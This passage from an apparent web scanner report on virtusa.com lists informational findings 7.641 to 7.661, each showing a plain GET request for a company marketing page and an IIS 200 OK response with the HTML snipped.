Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21255
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.641. http://www.virtusa.com/platforming/platforming-best-practices.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /platforming/platforming-best-practices.asp

Request

GET /platforming/platforming-best-practices.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21619
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:35:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:35:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.642. http://www.virtusa.com/platforming/why-platforming.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /platforming/why-platforming.asp

Request

GET /platforming/why-platforming.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21188
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:34:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:34:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.643. http://www.virtusa.com/practices/bpm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/bpm/

Request

GET /practices/bpm/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28066
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.644. http://www.virtusa.com/practices/bpm/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/bpm/default.asp

Request

GET /practices/bpm/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28066
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.645. http://www.virtusa.com/practices/dwbi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/dwbi/

Request

GET /practices/dwbi/ HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:31:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:31:37 GMT
Content-Length: 25711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.646. http://www.virtusa.com/practices/dwbi/center-of-excellence/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/dwbi/center-of-excellence/default.asp

Request

GET /practices/dwbi/center-of-excellence/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 24804
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.647. http://www.virtusa.com/practices/dwbi/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/dwbi/default.asp

Request

GET /practices/dwbi/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25711
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.648. http://www.virtusa.com/practices/dwbi/service-offerings/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/dwbi/service-offerings/default.asp

Request

GET /practices/dwbi/service-offerings/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26313
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.649. http://www.virtusa.com/practices/dwbi/technology-and-alliances/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/dwbi/technology-and-alliances/default.asp

Request

GET /practices/dwbi/technology-and-alliances/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25492
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.650. http://www.virtusa.com/practices/ecm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/ecm/

Request

GET /practices/ecm/ HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29330
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.651. http://www.virtusa.com/practices/ecm/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/ecm/default.asp

Request

GET /practices/ecm/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29330
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:26 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.652. http://www.virtusa.com/practices/software-testing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/

Request

GET /practices/software-testing/ HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/contactus/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:32:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:32:25 GMT
Content-Length: 22966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.653. http://www.virtusa.com/practices/software-testing/core-testing/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/core-testing/default.asp

Request

GET /practices/software-testing/core-testing/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21141
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.654. http://www.virtusa.com/practices/software-testing/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/default.asp

Request

GET /practices/software-testing/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22966
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.655. http://www.virtusa.com/practices/software-testing/test-consultancy/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/test-consultancy/default.asp

Request

GET /practices/software-testing/test-consultancy/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21415
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:41:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.656. http://www.virtusa.com/practices/software-testing/tools-expertise.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /practices/software-testing/tools-expertise.asp

Request

GET /practices/software-testing/tools-expertise.asp HTTP/1.1
Host: www.virtusa.com
Proxy-Connection: keep-alive
Referer: http://www.virtusa.com/practices/software-testing/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utmb=213023891

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:32:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:32:35 GMT
Content-Length: 27049


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.657. http://www.virtusa.com/privacy-statement.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /privacy-statement.asp

Request

GET /privacy-statement.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20247
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.658. http://www.virtusa.com/resources/agile-software-development.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/agile-software-development.asp

Request

GET /resources/agile-software-development.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19112
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.659. http://www.virtusa.com/resources/application-consolidation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/application-consolidation.asp

Request

GET /resources/application-consolidation.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19635
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:02:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.660. http://www.virtusa.com/resources/application-development-services.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/application-development-services.asp

Request

GET /resources/application-development-services.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19107
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.661. http://www.virtusa.com/resources/application-rationalization.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/application-rationalization.asp

Request

GET /resources/application-rationalization.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19552
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
